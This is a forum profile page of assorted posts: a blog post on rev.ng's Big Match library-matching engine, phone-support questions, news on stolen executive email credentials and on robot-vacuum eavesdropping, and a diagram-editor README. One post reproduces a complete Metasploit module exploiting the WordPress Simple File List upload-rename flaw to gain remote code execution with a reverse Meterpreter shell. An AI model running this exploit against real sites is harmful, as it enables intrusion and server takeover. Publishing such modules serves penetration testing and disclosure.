Everything posted by Kev
-
ToYaml.com -- Convert between Properties and YAML Online -- v20200619 https://www.toyaml.com/index.html Source
-
Today we are proud of showing the world the first prototype of Big Match, our tool to find open-source libraries in binaries only using their strings. How does it work? Read this post to find out, or head to our demo website to try it out. Spoiler: we are analyzing all the repositories on GitHub and building a search engine on top of that data. Introduction There's a thing that every good reverser does when starting to work on a target: look for interesting strings and throw them into Google hoping to find some open-source or leaked source. This can save you anywhere from few hours of work to several days. It's kind of a poor man's function (or library) matching. In 2018, I decided to try out LINE's Bug Bounty program and so I started reversing a library bundled with the Android version of the App. For those unfamiliar with LINE, it's the most used instant messaging App in Japan. Anyway, there were many useful error strings sprinkled all around my target, so I did exactly that manual googling I've just mentioned. Luckily, I was able to match some strings against Cisco's libsrtp. But little did I know, my target included a modified version of PJSIP, a huge library that does indeed include libsrtp. Unfortunately, I discovered this fact much later, so I wasted an entire week reversing an open-source library. Outline of our approach The way we, at rev.ng, decided to approach this problem is actually simple conceptually, but gets tricky due to the scale of the data we are dealing with. In short, this is the outline of what we did: Get the source code of the top C/C++ repositories on GitHub, where "top" means "most starred". Ideally we would like to analyze all of them, and we will eventually, but we wanted to give priority to famous projects. Deduplicate the repositories: we don't want to have 70k+ slightly different versions of the Linux kernel in our database. Extract the strings: use ripgrep as a quick way to extract strings from source code. De-escape the strings. E.g.: turn '\n' into an actual newline character. Hash the strings. Store them in some kind of database. Query the database using the hashes of the strings from a target binary. Cluster the query results. Where to start The first thing we did was figure out a way to get the list of all the repos on GitHub, sorted by stars. It turns out, however, that this is more easily said than done. GitHub has an official API but it is rate-limited and we wanted to avoid writing a multi-machine crawling system just for that. So we looked around and, among many projects making available GitHub data, we found the amazing GHTorrent. GHTorrent, short for GitHub Torrent, is a project created by Prof. Georgios Gousios of TU Delft. What it does is periodically poll GitHub's public events API and use the information on commits and new repositories to record the history of GitHub. So, for example, if user thebabush pushes some changes to his repository awesome-repo, GHTorrent analyzes those changes and, if the repo is not present in its database, it creates a new entry. It also saves its metadata, e.g. star count, and some of its commits. By exploiting the GitHub REST API, GHTorrent is able to create a somewhat complete relational view of all of GitHub (except for the actual source code): GHTorrent's data is made available as either a MySQL dump of the relational database in the picture or as a series of daily MongoDB dumps. GHTorrent uses Mongo as a caching layer for GitHub's API so that it can avoid making the same API call twice. 
Once you import the GHTorrent MySQL dumps on your machine, you can quickly get useful information about GitHub using good ol' SQL (e.g.: information about the most popular C/C++ repos is a simple SELECT ... WHERE ... ORDER BY ...). It also contains information about forks and commits, so you have some good data to exploit for the repo deduplication we want to do. However, GHTorrent is best-effort by design, so you'll never have a complete and consistent snapshot of GitHub. For example, some repos might be missing or have outdated metadata. Another example is that commit information is partial: GHTorrent cannot possibly associate every commit with every repository containing it. Think about the Linux kernel: one commit would need to be added to 70k+ forks and that kind of thing doesn't scale very well. Finally, there's another risk regarding the use of a project like GHTorrent: maintenance. Keeping a crawler working costs money and time, and it seems like in the last couple of years they haven't been releasing MySQL dumps that often anymore. On the other hand, they still release their incremental Mongo updates daily. Since they create the MySQL DB using REST API calls that are cached through MongoDB, those incremental updates should be everything you need to recreate their MySQL database. A fun fact is that Microsoft used to sponsor GHTorrent, but I guess they don't need to do it now. And yes, that's not a good thing for us. In the end, since we don't actually need all the tables provided by the GHTorrent MySQL dump, we decided to write a script that directly consumes their Mongo dumps one by one and outputs the information we need into a bunch of text files. In fact, most of our pipeline is implemented using bash scripts (you can read more in our future blogpost about what we like to call bashML). Repository deduplication We mentioned in the outline that we need to deduplicate the repositories. We need to do that for several reasons: As stated earlier, we don't want to download every single fork of every single famous project out there. Duplicated data means that our database of repos grows very fast in size. The first ~100K repos we downloaded from GitHub amount to ~1.4TB of gzip'd source code (without git history), so you can see why this is an important point. Duplicated data is bad for search results accuracy. GHTorrent has information about forks but, as with GitHub itself, that only counts forks created with the "Fork" button on the web UI. The other option is to look for common commits between repositories. If we had infinite computing resources, we would do this: Clone every repository we care about. Put every commit hash in a graph database of some kind. Connect commit hashes using their parent/child relationship. Find the root commits. For every root commit, keep only the most-starred repo. However, we live in the real world, so this is simply impossible for us to do. We would like to have a strategy to deduplicate repos before cloning them, as cloning would require a lot of time and bandwidth. On top of that, when using git you can merge the history of totally unrelated projects. So, if you deduplicate repos based on the root commit alone, you end up removing a lot of projects you actually want to keep. Case in point: octocat/Spoon-Knife. octocat/Spoon-Knife is the most forked project on GitHub, and there's a reason for that: it's the repo that is used in GitHub's tutorial on forking. This means that a lot of people learning to use GitHub have forked this repo at some point.
You might be wondering why Spoon-Knife causes trouble for our theoretical deduplication algorithm. Well, take a look at this screenshot of LibreCAD's git history: At some point in the past some user by the name of youarefunny was learning to use GitHub and so he forked Spoon-Knife. At some other point, he forked LibreCAD and made some commits. Then, for whatever reason, he thought "well, why not merge the history of these two nice repositories in a single one? So we can have a branch with the history of both projects!". And finally, just to fuck with us... I mean, to contribute to a useful open-source project like LibreCAD, he decided to open a pull request using that exact branch. And that pull request was accepted. TL;DR: the history of Spoon-Knife is included in LibreCAD's repo. If you want to check this out, visit this link or clone LibreCAD/LibreCAD and run git diff f08a37f282dd30ce7cb759d6cf8981c982290170. Things like this present a serious issue for us because Spoon-Knife has 10.3k stars at the moment, while LibreCAD only has 2k. Which means that if we were to remove the least starred project, we would actually remove LibreCAD and keep the utterly useless Spoon-Knife repo. I hate you, youarefunny. And no, you are not actually funny. But youarefunny is not alone in this: during our tests we've found that some people also like to merge the history of Linux and LLVM. Go figure. Best-effort deduplication So we can't git clone every repo on GitHub and we can't do root-based deduplication. What we can do is use GHTorrent once again and implement a different strategy. In fact, GHTorrent has information about commits, too, albeit limited. This is what it gives us: (partial) (parent commit, child commit) relations. (partial) (commit, repository) relations. Exploiting this data we can't reconstruct the full git history of every repository, but we can recreate subgraphs of it. We then apply this algorithm (sketched in code below): Find a commit for which GHTorrent doesn't have a parent (we call them parentless commits) and consider it a root commit. Explore the commit history graph starting at a root commit. We do this going upward, that is, only following parent → child edges. We group all the repositories associated with the commits of a subgraph we obtain in step 2. We call such a group a repository group. For every repository group, we find the most starred repo it contains and consider it the parent repo, while we consider the others the child repos. We now have several (parent repo, child repo) relations. We do all the previous steps for all the commit data in GHTorrent and obtain a huge graph of repositories related by has_parent relations. We take all the repositories without parents and consider them unique repos. In other words, we will not crawl repos for which we have a parent. This is easier shown than explained, so let's start with the following example git history graph: We have 5 commits (A, B, C, D and E), related by is_parent relations, and for each commit we have data on which repos contain them. We have 2 root commits, A and E, and for each of them we perform steps 2 and 3 to create their repository groups: You can see that we get groups Group 1 and Group 2. We then take every group, together with the star counts of its repos, and create a partial repository graph. For example, if we take Group 2 from above, we get this: repo4 is the repo with the most stars in Group 2, so we assume that the other repos in the group are forked from it.
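To make the grouping concrete, here is a minimal, self-contained sketch of the algorithm above. Everything in it is illustrative: the toy commit graph loosely mirrors the 5-commit example (A through E), while the repo assignments, star counts and data structures are our own assumptions, not the actual rev.ng pipeline, which works on GHTorrent dumps and text files rather than in-memory dictionaries.

```python
from collections import defaultdict

# Toy data: commit -> list of parent commits, commit -> repos containing it,
# and repo -> star count. All values are made up for illustration.
parents = {"A": [], "B": ["A"], "C": ["B"], "D": ["E"], "E": []}
commit_repos = {
    "A": {"repo1", "repo2"}, "B": {"repo1", "repo2"}, "C": {"repo2"},
    "D": {"repo3", "repo4", "repo5"}, "E": {"repo3", "repo4"},
}
stars = {"repo1": 10, "repo2": 3, "repo3": 1, "repo4": 50, "repo5": 2}

# Invert the parent relation so we can walk the history "upward" (parent -> child).
children = defaultdict(list)
for commit, ps in parents.items():
    for p in ps:
        children[p].append(commit)

def repository_group(root):
    """Steps 2-3: explore the subgraph reachable from a parentless commit and
    collect every repository associated with the commits we visit."""
    group, stack, seen = set(), [root], set()
    while stack:
        commit = stack.pop()
        if commit in seen:
            continue
        seen.add(commit)
        group |= commit_repos.get(commit, set())
        stack.extend(children[commit])
    return group

# Step 1: parentless commits are treated as root commits.
roots = [c for c, ps in parents.items() if not ps]

# Steps 4-5: inside each group, the most-starred repo becomes the parent and
# every other repo in the group gets a has_parent edge pointing at it.
has_parent = {}
for root in roots:
    group = repository_group(root)
    parent_repo = max(group, key=stars.get)
    for repo in group - {parent_repo}:
        has_parent[repo] = parent_repo

# Step 6: repos that never appear as a child are the "unique" ones to crawl.
unique_repos = sorted(set(stars) - set(has_parent))
print(unique_repos)   # -> ['repo1', 'repo4']
```

With the toy data, the group rooted at A collapses onto repo1 and the group rooted at E onto repo4, which is the behaviour described in the walkthrough above.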
By joining all the partial repository graphs we extract from all the groups we've found, we get the full repository graph: We can now take the repositories without a parent and consider them as deduplicated repos. In other words, we will only crawl the repositories marked in red in the picture. This is pretty much how we try to deduplicate repositories prior to cloning them. Now, before you write us angry comments: we know this is not perfect, but it works and is a good trade-off between deduplicating too much and not deduplicating at all. From source code to string hashes After crawling the repos resulting from the previous step, we need to analyze their C/C++ files to extract the strings inside them. Parsing C/C++ files is non-trivial due to macros, include files, and all those C magic goodies. In this first iteration of Big Match we wanted to be fast and favoured a simple approach: using grep (actually, ripgrep). So yeah, we just grep for single-line string literals and store them in a txt file. Then, we take every string from the file and de-escape it so special characters like '\n' are converted to the real ascii character they represent. We do this because, of course, once strings pass through the compiler and end up in the final binary, they are not escaped anymore, so we try to emulate that process. Finally, we hash the strings and store the hex-coded hashes, again, in a txt file. This is nice because we end up with 3 files per repo: A tarball with its source code. A txt file with its strings. A txt file with its hashes (<repo_name>.hashes.txt) If you are wondering why we like txt files so much, be sure to read the next section. Polishing the data As said above, our repository analysis pipeline leaves us with many <repo_name>.hashes.txt files containing all the hex-coded hashes of the strings in a repository. It's now time to turn those files into something that we can use to build a search engine. Search engine 101 A lot of modern search engines include some kind of vector space model. This is a fancy way to say that they represent a document as a vector of words. For example: txt_0 = "hello world my name is babush" txt_1 = "good morning babush" # once encoded, it becomes: doc_0 = [ 1, # hello 1, # world 1, # my 1, # name 1, # is 1, # babush 0, # good 0, # morning ] doc_1 = [ 0, # hello 0, # world 0, # my 0, # name 0, # is 1, # babush 1, # good 1, # morning ] There are many flavours of vector space models, but the main point is that instead of just using a boolean value for the words, one can use word counts or some weighting scheme like tf-idf (more on this later). What does the vector space model have to do with Big Match? Just swap repositories for documents and string hashes for words and you've got a model for building a repository search engine. And, instead of querying using a sequence of words, you just use a vector of string hashes like they were a new repository. In our case, we decided not to count the number of times a string is present in a repository, so we just need to put a 1 if a string is present in a repo and then apply some weighting formula to tell the model that some strings are more important than others. Now, how do you turn a bunch of txt files into a set of vectors? Enter bashML. You will read about it in another article on our blog, but the main point is that we can do everything using just bash scripts by piping coreutils programs. 
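Before the bash pipeline turns those txt files into vectors, each repository's strings have to be extracted, de-escaped, hashed and encoded. The following sketch shows that per-repo step plus the presence-vector encoding just described; the regex and the choice of SHA-1 are our own assumptions for illustration, since the real pipeline greps literals with ripgrep and is built out of bash scripts.

```python
import codecs
import hashlib
import re

# Naive single-line C/C++ string-literal pattern; a rough stand-in for the
# ripgrep pass used by the real pipeline.
STRING_LITERAL = re.compile(r'"((?:[^"\\\n]|\\.)*)"')

def string_hashes(source_text):
    """Extract string literals, de-escape them (so '\\n' becomes a real
    newline, as it would after compilation), then hash them."""
    hashes = set()
    for literal in STRING_LITERAL.findall(source_text):
        raw = codecs.decode(literal, "unicode_escape")   # de-escape
        hashes.add(hashlib.sha1(raw.encode("utf-8", "replace")).hexdigest())
    return hashes

# A repo is then just the set of its hashes; given a global vocabulary
# (one column per known hash), that set becomes the 0/1 presence vector
# described in the vector space model above.
def presence_vector(repo_hashes, vocabulary):
    return [1 if h in repo_hashes else 0 for h in vocabulary]

if __name__ == "__main__":
    demo = 'printf("hello world\\n"); puts("babush");'
    hashes = string_hashes(demo)
    vocab = sorted(hashes) + ["0" * 40]    # one hash that is not in the repo
    print(presence_vector(hashes, vocab))  # [1, 1, 0]
```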
A picture is worth a million words, so enjoy this visualization of a part of our bash pipeline (created with our internal tool pipedream): Algorithms and parameter estimation The next step was to evaluate the best algorithms for weighting the strings in our repos/vectors. For this, we created an artificial dataset using strings from libraries we compiled ourselves (thanks Gentoo). Without going into the details, it turns out that tf-idf weighting and simple cosine similarity work very well for our problem. For those of you unfamiliar with these terms: Tf-idf is a very common weighting scheme that considers both the popularity of the words in a document (in our case, string hashes in a repo) and the size of the documents (in our case, repositories). In tf-idf, popular words are penalized because it is assumed that common words convey less information than rare ones. Similarly, short documents are considered more informative than long documents, as the latter tend to match more often just because they contain more words. Cosine similarity, also very common, is one of the many metrics one can use to calculate the distance between vectors. Specifically, it measures the angle between a pair of N-dimensional vectors: a similarity close to 1 means a small angle, while a value close to 0 means the vectors are orthogonal. Long story short: scoring boils down to calculating the cosine distance between a given repo and the input set of hashes (both weighted using tf-idf). We also wanted to study whether removing the top-K most common strings could improve the results of a query. Our intuition was that very frequent strings like "error" aren't very useful in disambiguating repositories. In fact, removing the most common strings did improve our results: cutting around K = 10k seemed to give the best score. After some plotting around, we increased our confidence in that magic number: Note: both axes use a logarithmic scale. You can easily see that the first ~10k most frequent strings (on the left of the red line) are very popular, then there's a somewhat flat area, and finally an area of infrequent strings on the right. The graph, together with our tests, confirms that keeping the strings that are too popular actually makes the query results worse. At this point, due to the large number of near-duplicates still present in our database, the repo similarity scores looked like this:
$ strings /path/to/target | ./query.sh
0.95 repoA
0.94 repoA-fork1
0.92 repoA-fork2
0.91 repoA-fork3
...
0.60 repoB
0.59 repoB-fork1
0.57 repoB-fork3
0.52 library-with-repoB-sourcecode-inside
...
This is a huge problem because it means that if we just show the top-K repositories that have the highest similarity to our query, they are mostly different versions of the same repo. If there are two repos inside our binary, for example zlib and libssl, one of the two would be buried deep down in the results due to the many zlib or libssl versions out there. On top of that, developers often just copy zlib or libssl source code in their repos to have all dependencies ready on clone. For these reasons we wanted to cluster the search results. We once again used our artificial Gentoo dataset, plus some manual result evaluation, and ended up choosing spectral co-clustering as our clustering algorithm. We also plotted the clustered results and they looked pretty nice: On the x-axis you have the strings that match our example query, while on the y-axis you have the repositories matching at least one string hash. A red pixel means that repo y contains string x. The blue lines are just there to mark the different repository clusters. Due to the nature of spectral co-clustering, the more the plot looks like a block diagonal matrix, the better the clustering results are. It's interesting to note that strings plus clustering are good enough to visually identify similar repositories. One might also be able to use strings to guess whether a repository is wholly contained in a bigger one (once again, think of something like zlib inside the repo of an image compression program).
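To tie the weighting and scoring pieces together, here is a compact sketch using scikit-learn on a toy presence matrix. The library choice and the toy numbers are our illustration only; the real engine works on a far larger sparse matrix produced by the bash pipeline described above.

```python
import numpy as np
from scipy.sparse import csr_matrix
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.metrics.pairwise import cosine_similarity

# Toy presence matrix: 4 repos x 5 string hashes (1 = repo contains that string).
repos = ["zlib", "zlib-fork", "libssl", "spoon-knife"]
X = csr_matrix(np.array([
    [1, 1, 1, 0, 0],
    [1, 1, 0, 0, 0],
    [0, 0, 1, 1, 1],
    [0, 0, 0, 0, 1],
]))

# tf-idf: down-weight strings that appear in many repos and normalize row
# lengths so that small repos are not drowned out by huge ones.
tfidf = TfidfTransformer(norm="l2")
X_w = tfidf.fit_transform(X)

# A query is encoded exactly like a repo: a 0/1 vector over the same columns.
query = csr_matrix(np.array([[1, 1, 1, 0, 0]]))
q_w = tfidf.transform(query)

# With normalized vectors, cosine similarity reduces to a matrix multiplication.
scores = cosine_similarity(q_w, X_w).ravel()
for name, score in sorted(zip(repos, scores), key=lambda t: -t[1]):
    print(f"{score:.2f}  {name}")
```

Running it ranks zlib first, its fork just below, and the unrelated repos near zero, which is exactly the near-duplicate problem that motivates the clustering step.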
Putting it into production Putting everything we have shown into a working search engine is just a matter of loading all the repo vectors into a huge (sparse) matrix and waiting for a query vector from the user. By query vector we mean that, once the user gives us a set of strings to search in Big Match, we encode them in a vector using the encoding scheme we've shown earlier. Since we use tf-idf and normalize properly, a matrix multiplication is all we need to score every repository against the query: scores = M · q, where M is the sparse repository-by-string matrix (tf-idf weighted and normalized) and q is the query vector weighted the same way. After that we just need to use the scores to find the best-matching repositories, cluster them using their rows in the big matrix, and show everything to the user. But don't take our word for it, try our amazing web demo. A second deduplication step When we tried out our pipeline for the first time, the average amount of RAM required to store a repo vector was around 40kB. That's not too much, but we plan to have most of GitHub's C/C++ repos in memory so we wanted to decrease it even more. Since we use a sparse matrix, memory consumption is proportional to the number of elements we store, where an element is stored iff it is non-zero. In order to get a better insight into our initial dataset, we plotted the top-10k repos with the most strings to look at their string distribution: The average string count, 23k, is shown in red in the picture. We also marked in green the position of a repository with ~23k strings, which is basically the repo with the average string count. It follows that if we sum everything on the left of the green line we get (almost) the same number that we get if we sum everything on the right. In other words, the area under the blue curve (in the complete, uncropped plot) is divided evenly by the green line. If we keep in mind that at this point the dataset was made out of ~60k repositories, this means that the top-5k biggest repos occupied as much RAM as the remaining ~55k repos. By looking at the plot we can say that if we manage to better deduplicate the most expensive (memory-wise) repositories, we should be able to lower the average amount of memory per repository by quite a bit. In case you are wondering what those projects are, they are mostly Android or plain Linux kernels that are dumped on GitHub as a single commit, so they bypass our first deduplication pass. Since at this point we have the source code of every repository that passed through the first deduplication phase, we can apply a second, more expensive, content-aware deduplication to try to improve the situation. For this, we wrote a bash script that computes the Jaccard similarity of the biggest repositories in our dataset and, given two very similar projects, only keeps the most-starred one. By using this method we are able to successfully deduplicate a lot of big repositories and decrease RAM usage significantly.
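The real second pass is a bash script; the sketch below only illustrates the same idea on string-hash sets, and the 0.8 similarity threshold is an assumption of ours, not a number from the article.

```python
from itertools import combinations

def jaccard(a, b):
    """Jaccard similarity of two string-hash sets: |A & B| / |A | B|."""
    return len(a & b) / len(a | b) if (a or b) else 0.0

def dedup_big_repos(hash_sets, stars, threshold=0.8):
    """Compare the biggest repos pairwise and, for every very similar pair,
    keep only the most-starred one. The threshold value is an assumption."""
    dropped = set()
    ordered = sorted(hash_sets, key=lambda r: -len(hash_sets[r]))  # biggest first
    for r1, r2 in combinations(ordered, 2):
        if r1 in dropped or r2 in dropped:
            continue
        if jaccard(hash_sets[r1], hash_sets[r2]) >= threshold:
            dropped.add(r2 if stars[r1] >= stars[r2] else r1)
    return set(hash_sets) - dropped

# Two near-identical kernel dumps plus an unrelated small repo.
hash_sets = {
    "android-kernel-dump-1": {"h1", "h2", "h3", "h4"},
    "android-kernel-dump-2": {"h1", "h2", "h3", "h4", "h5"},
    "tiny-lib": {"h9"},
}
stars = {"android-kernel-dump-1": 12, "android-kernel-dump-2": 3, "tiny-lib": 40}
print(sorted(dedup_big_repos(hash_sets, stars)))
# ['android-kernel-dump-1', 'tiny-lib']
```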
Pros and cons Time to talk about the good and the bad of this first iteration of Big Match. Pros: Perfect string-matching works surprisingly well. Privacy: if a hash doesn't match, we don't know what string it represents. Cons: We get relevant results only for binaries with a decent amount of strings. At the moment, we only do perfect matching: in the future we want to support partial matches. Query speed is good enough but we need to make it faster as we scale up our database. Using strings is sub-optimal: a proper decompiler-driven string extraction algorithm would be able to exploit, for example, pointers in the binary to better understand where strings actually start (strings is limited to very simple heuristics). So, instead of picking up strings with wrong prefixes like "XRWFHello World", we would be able to extract the actual string "Hello World". Conclusion Gone are the days of reversers like me wasting weeks reversing open-source libraries embedded in their targets. Ok, maybe not yet, but we made a big step towards that goal and, while quite happy with the results of Big Match v1, we are already planning for the next iteration of the project. First of all, we want to integrate Big Match with our decompiler. Then, we want to add partial string matching and introduce support for magic numbers/arrays (think well-known constants like file format headers or cryptographic constants). We also want to test whether strings and constants can be reliably used to guess the exact version of a library embedded in a binary (if you have access to a library's git history, you can search for the commit that results in the best string matches). In the meantime, we need to battle-test Big Match's engine and scale the size of our database so that we can provide more value to the users. Finally, it would be interesting to add to our database strings taken directly from binaries for which there are no sources available (e.g.: firmware, malware, etc...). Once again, if you haven't done it already, go check out our Big Match demo and tell us what you think. Until then, babush Source
-
Hi, how can a phone (a 2020 smartphone) be recovered in case of theft etc. after a hard reset? Cloud: ruled out; imeipro.info: ruled out; fingerprint: ruled out; facial recognition: ruled out. Any other methods? Thanks!
-
Access is sold for $100 to $1500 per account, depending on the company size and exec role. Image: Ryoji Iwata A threat actor is currently selling passwords for the email accounts of hundreds of C-level executives at companies across the world. The data is being sold on a closed-access underground forum for Russian-speaking hackers named Exploit.in, ZDNet has learned this week. The threat actor is selling email and password combinations for Office 365 and Microsoft accounts, which he claims are owned by high-level executives occupying functions such as: CEO - chief executive officer COO - chief operating officer CFO - chief financial officer or chief financial controller CMO - chief marketing officer CTOs - chief technology officer President Vice president Executive Assistant Finance Manager Accountant Director Finance Director Financial Controller Accounts Payables Access to any of these accounts is sold for prices ranging from $100 to $1,500, depending on the company size and user's role. The seller's ad on Exploit.in Image via KELA A source in the cyber-security community who agreed to contact the seller to obtain samples has confirmed the validity of the data and obtained valid credentials for two accounts, the CEO of a US medium-sized software company and the CFO of an EU-based retail store chain. The source, which requested that ZDNet not use its name, is in the process of notifying the two companies, but also two other companies for which the seller published account passwords as public proof that they had valid data to sell. These were login details for an executive at a UK business management consulting agency and for the president of a US apparel and accessories maker. Sample login provided by the seller as public proof Image via KELA The seller refused to share how he obtained the login credentials but said he had hundreds more to sell. According to data provided by threat intelligence firm KELA, the same threat actor had previously expressed interest in buying "Azor logs," a term that refers to data collected from computers infected with the AzorUlt info-stealer trojan. Infostealer logs almost always contain usernames and passwords that the trojan extracts from browsers found installed on infected hosts. This data is often collected by the infostealer operators, who filter and organize it, and then put it on sale on dedicated markets like Genesis, on hacking forums, or they sell it to other cybercrime gangs. But, most likely, the compromised emails will be bought and abused for CEO scams, also known as BEC scams. According to an FBI report this year, BEC scams were, by far, the most popular form of cybercrime in 2019, having accounted for half of the cybercrime losses reported last year. The easiest way of preventing hackers from monetizing any type of stolen credentials is to use a two-step verification (2SV) or two-factor authentication (2FA) solution for your online accounts. Even if hackers manage to steal login details, they will be useless without the proper 2SV/2FA additional verifier. Via zdnet.com
-
^ :)) Killuminatii power. On topic: I'm returning it within 30 days; I don't think I'll do a factory reset, so I don't void the warranty.
-
Pouch, cover, bag... you didn't clear up point 5 for me. It's something new since the 21st; I'll either wait for an update or downgrade it. Thanks anyway.
-
^ Thanks for the reply, it's a 0day on my Android version. I'll read what's in the ToS. ^ ^ ^ I just love little guys like you who take joy in other people's problems; you really seem to get a kick out of it. Lucky for you, you get to do it from behind a keyboard.
-
It's not that, man, the "book cover" case has magnets. The phone was bought from a supermarket in Romania (it's not some cheap Chinese knock-off).
-
Hi, I recently received a new, sealed, quad-core smartphone fitted with a "book cover" style case. I haven't installed anything at all on it, yet the display sometimes responds in a way that leaves much to be desired (slow motion). I removed the crappy case; it still acts up, but more rarely. Is it possible that some circuits got damaged? It has worn the "cover" for at most 7-10 days. Should I send it in for service? (It's under warranty.) Thank you.
-
quiver is a modern, graphical editor for commutative and pasting diagrams, capable of rendering high-quality diagrams for screen viewing, and exporting to LaTeX via tikz-cd. Creating and modifying diagrams with quiver is orders of magnitude faster than writing the equivalent LaTeX by hand and, with a little experience, competes with pen-and-paper. Try quiver out: q.uiver.app Features & screenshots quiver features an efficient, intuitive interface for creating complex commutative diagrams and pasting diagrams. It's easy to draw diagrams involving pullbacks and pushouts, adjunctions, and higher cells. Object placement is based on a flexible grid that resizes according to the size of the labels. There is a wide range of composable arrow styles. quiver is intended to look good for screenshots, as well as to export LaTeX that looks as close as possible to the original diagram. Diagrams may be created and modified using either the mouse, by clicking and dragging, or using the keyboard, with a complete set of keyboard shortcuts for performing any action. When you export diagrams to LaTeX, quiver will embed a link to the diagram, which will allow you to return to it later if you decide it needs to be modified, or to share it with others. Other features Multiple selection, making mass changes easy and fast. A history system, allowing you to undo/redo actions. Support for custom macro definitions: simply paste a URL corresponding to the file containing your \newcommands. Panning and zooming, for large diagrams. Smart label alignment and edge offset. Building Make sure you have installed yarn and have a version of make that supports .ONESHELL (e.g. GNU Make 3.82). Clone the repository, and run make which will build KaTeX. Then simply open src/index.html in your favourite web browser. If you have any problems building quiver, open an issue detailing the problem and I'll try to help. Thanks to S. C. Steenkamp , for helpful discussions regarding the aesthetic rendering of arrows. AndréC for the custom TikZ style for curves of a fixed height. Everyone who has improved quiver by reporting issues or suggesting improvements. Download quiver-master.zip or git clone https://github.com/varkor/quiver.git Source
-
This Metasploit module exploits WordPress Simple File List plugin versions prior to 4.2.3, which allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed to php and executed. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Simple File List Unauthenticated Remote Code Execution', 'Description' => %q{ Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed to php and executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'coiffeur', # initial discovery and PoC 'h00die', # msf module ], 'References' => [ [ 'URL', 'https://wpscan.com/vulnerability/10192' ], [ 'URL', 'https://www.cybersecurity-help.cz/vdb/SB2020042711' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list' ], [ 'EDB', '48349' ] ], 'Platform' => [ 'php' ], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Default', { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2020-04-27', 'DefaultTarget' => 0, 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), ] ) end def dir_path '/wp-content/uploads/simple-file-list/' end def upload_path '/wp-content/plugins/simple-file-list/ee-upload-engine.php' end def move_path '/wp-content/plugins/simple-file-list/ee-file-engine.php' end def upload(filename) print_status('Attempting to upload the PHP payload as a PNG file') now = Date.today.to_time.to_i.to_s data = Rex::MIME::Message.new data.add_part('1', nil, nil, 'form-data; name="eeSFL_ID"') data.add_part(dir_path, nil, nil, 'form-data; name="eeSFL_FileUploadDir"') data.add_part(now, nil, nil, 'form-data; name="eeSFL_Timestamp"') data.add_part(Digest::MD5.hexdigest("unique_salt#{now}"), nil, nil, 'form-data; name="eeSFL_Token"') data.add_part("#{payload.encoded}\n", 'image/png', nil, "form-data; name=\"file\"; filename=\"#{filename}.png\"") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, upload_path), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 # the server will respond with a 200, but if the timestamp and token dont match it wont give back SUCCESS as it failed fail_with(Failure::UnexpectedReply, "#{peer} - File failed to upload") unless res.body.include?('SUCCESS') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.png"), 'method' => 'GET' ) fail_with(Failure::Unreachable, "#{peer} - 
Could not connect") unless res # 404 could be AV got it or something similar fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}. File was uploaded successfully, but could not be found.") if res.code == 404 fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 print_good('PNG payload successfully uploaded') end def rename(filename) print_status("Attempting to rename #{filename}.png to #{filename}.php") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, move_path), 'method' => 'POST', 'vars_post' => { 'eeSFL_ID' => 1, 'eeFileOld' => "#{filename}.png", 'eeListFolder' => '/', 'eeFileAction' => "Rename|#{filename}.php" } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 print_good("Successfully renamed #{filename}.png to #{filename}.php") end def check return CheckCode::Unknown unless wordpress_and_online? # check the plugin version from readme check_plugin_version_from_readme('simple-file-list', '4.2.3', '1.0.1') end def exploit # filename of the file to be uploaded/created filename = Rex::Text.rand_text_alphanumeric(8) register_file_for_cleanup("#{filename}.php") upload(filename) rename(filename) print_status('Triggering shell') send_request_cgi( 'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.php"), 'method' => 'GET' ) end end Source
-
The method used to empty the accounts of celebrities in Romania.
Kev replied to KtLN's topic in Stiri securitate
I haven't read the full article, but usually the "BMW-driving hotshots" hook up with the cute female operators and... get access to the system. -
Researchers have unveiled an attack that allows attackers to eavesdrop on homeowners inside their homes, through the LiDAR sensors on their robot vacuums. Researchers have uncovered a new attack that lets bad actors snoop in on homeowners’ private conversations – through their robot vacuums. The vacuums, which utilize smart sensors in order to autonomously operate, have gained traction over the past few years. The attack, called “LidarPhone” by researchers, in particular targets vacuums with LiDAR sensors, as the name suggests. LiDAR, which stands for Light Detection and Ranging, is a remote sensing method that uses light in the form of a pulsed laser to measure distances to or from nearby objects. The technology helps vacuums navigate around obstacles on the floor while they clean. The good news is that the attack is complex: Attackers would need to have already compromised the device itself (in their attack, researchers utilized a previously discovered attack on the vacuum cleaners). Additionally, attackers would need to be on the victim’s local network to launch the attack. Threatpost has reached out to the researchers for further information on the specific equipment utilized to launch the attack, as well as the complexity of the attack; and will update this article accordingly. The core idea behind the attack is to remotely access the vacuum cleaner’s 